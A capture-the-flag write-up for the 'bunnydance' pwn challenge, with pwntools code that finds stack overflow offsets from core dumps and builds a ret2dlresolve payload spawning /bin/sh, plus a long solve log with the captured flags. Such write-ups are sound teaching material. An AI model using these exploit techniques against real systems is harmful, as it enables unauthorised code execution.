Tags: pwn aeg
Rating: 5.0
# bunnydance
**Category**: Pwn \
**Points**: 497 (9 solves) \
**Author**: nsnc
## Challenge
Wait a minute isn't this just DARPA CGC LITE v3.0?
Guys seriously maybe we should stop putting this challenge in every CTF...
Difficulty: Medium
`chal.b01lers.com 4001`
## Overview
Server sends you 9 binaries in random order and you have to pwn them all to get
the flag.
Here's an example of one of the binaries:
int main() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
// break up main in random line increments into seperate functions
char input[48]; // buffer varies
puts("Name: "); // puts, printf, write, fwrite. print_output function, Text varies
gets(input); // gets, fgets, scanf, strcpy, memcpy, fread
puts("Hello, "); // puts, printf, write, fwrite print_output function text varies
## Solution
We're guaranteed a stack buffer overflow (no canary), so we can automatically
calculate the offset to the stack return address like so:
def get_rip_offset(chall):
# Generate a cyclic pattern so that we can auto-find the offset
payload = pwn.cyclic(128)
# Run the process once so that it crashes
io = pwn.process(chall)
# Get the core dump
core = pwn.Coredump("./core")
# Our cyclic pattern should have been used as the crashing address
offset = pwn.cyclic_find(core.fault_addr & (2 ** 32 - 1))
return offset
To pop a shell, we can just use ret2dlresolve.
def get_ret2dlresolve(elf, offset):
# Pwntools script kiddie solution
bss = elf.bss(0x100 - 8)
ret2dl = pwn.Ret2dlresolvePayload(elf, "system", ["/bin/sh"], bss)
rop = pwn.ROP(elf)
rop.raw(rop.ret.address) # ret gadget to align stack
return b"A" * offset + rop.chain() + b"\n" + ret2dl.payload
> I saw another solution that uses ret2libc (ropping to `puts` to print
> `__libc_start_main`, then going back to `main` to overflow again)
Now we just have to wrap it in a pwntools script to interact with the server.
Full script in `solve.py`, output:
$ python3 solve.py
[+] Opening connection to chal.b01lers.com on port 4001: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall'
Arch: amd64-64-little
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[!] Could not find executable 'chall' in $PATH, using './chall' instead
[+] Starting local process './chall': pid 33175
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33175)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x401203
RSP: 0x7fffa1690f28
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x400000)
Fault: 0x6161616c6161616b
[*] Loaded 15 cached gadgets for 'chall'
[+] Flag: b'bctf{th3_bunny_ate_all_the_carrots_what_4_p1g}'
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './chall': pid 33179
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33179)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x4011f3
RSP: 0x7ffec95ee678
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x6161616661616165
[+] Flag: b'bctf{(=^_^=)}'
[+] Starting local process './chall': pid 33182
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33182)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x4011f3
RSP: 0x7ffda72cab58
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x6161616661616165
[+] Flag: b'bctf{are_you_tired_of_pwning_yet...im_not!}'
[+] Starting local process './chall': pid 33185
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33185)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x401237
RSP: 0x7ffe09ce76c8
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x6161616c6161616b
[*] Loaded 14 cached gadgets for 'chall'
[+] Flag: b'bctf{1tz_h4ll0w33n_1n_r3v3rse}'
[+] Starting local process './chall': pid 33189
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33189)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x401203
RSP: 0x7ffdf68fe068
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x6161616c6161616b
[+] Flag: b'bctf{put_the_eggs_in_the_basket_old_man}'
[+] Starting local process './chall': pid 33193
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33193)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x401217
RSP: 0x7ffef4d5dfb8
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x6161616661616165
[+] Flag: b'bctf{an1m4l_cr0ss1ng_t0day_looks_m0re_fun_than_ctf}'
[+] Starting local process './chall': pid 33199
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33199)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x4011f3
RSP: 0x7ffec112ca18
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x616161706161616f
[+] Flag: b'bctf{stop_k1d_th4ts_n0t_the_34ster_bunny}'
[+] Starting local process './chall': pid 33202
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33202)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x401217
RSP: 0x7ffeda483788
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x616161706161616f
[+] Flag: b'bctf{ch0c0late_bunnies_r_l1k3_chal_authors_hollow_and_annoying}'
[+] Starting local process './chall': pid 33205
[*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 33205)
[+] Parsing corefile...: Done
[*] '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/core'
Arch: amd64-64-little
RIP: 0x4011f3
RSP: 0x7ffdbacb8fb8
Exe: '/home/plushie/Programs/bbb_writeups/2021/b01lers_ctf/bunnydance/chall' (0x401000)
Fault: 0x616161706161616f
[+] Flag: b'bctf{b0utt4_ch0k3_on_a_cadbury_cr3am_egg_th1s_y3ar}'
[*] Switching to interactive mode
Time hops on...
[*] Got EOF while reading in interactive